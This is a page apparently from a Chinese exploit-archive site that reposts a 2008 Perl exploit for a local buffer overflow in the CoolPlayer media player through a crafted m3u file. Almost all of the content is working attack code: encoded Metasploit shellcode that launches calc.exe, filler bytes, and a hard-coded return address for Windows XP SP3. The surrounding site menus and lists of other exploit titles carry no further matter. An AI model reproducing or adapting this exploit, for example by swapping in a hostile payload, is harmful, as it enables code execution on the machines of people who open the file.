首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CoolPlayer m3u File Local Buffer Overflow Exploit
来源:www.metasploit.com 作者:Guido 发布时间:2008-07-30  
#!/usr/bin/perl
# k`sOSe - 07/29/2008

use warnings;
use strict;

# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" .
"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
"\x1e\x28\x44\xd4";

print $shellcode .
"\x41" x (218 - length($shellcode)) .
"\x32\x4c\x3c\x7e" ; # call ebx  user32.dll  winxp sp3
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cisco IOS 12.3(18) FTP Server
·e107 Plugin BLOG Engine 2.2 Bl
·Trend Micro OfficeScan ObjRemo
·HIOX Random Ad 1.3 Arbitrary A
·IceBB <= 1.0-RC9.2 Blind SQL I
·HIOX Browser Statistics 2.0 Ar
·BIND 9.x Remote DNS Cache Pois
·eNdonesia 8.4 (Calendar Module
·Wordpress Plugin Download Mana
·Pligg <= 9.9.0 Remote Code Exe
·Microsoft Access (Snapview.ocx
·NCTsoft AudFile.dll ActiveX Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved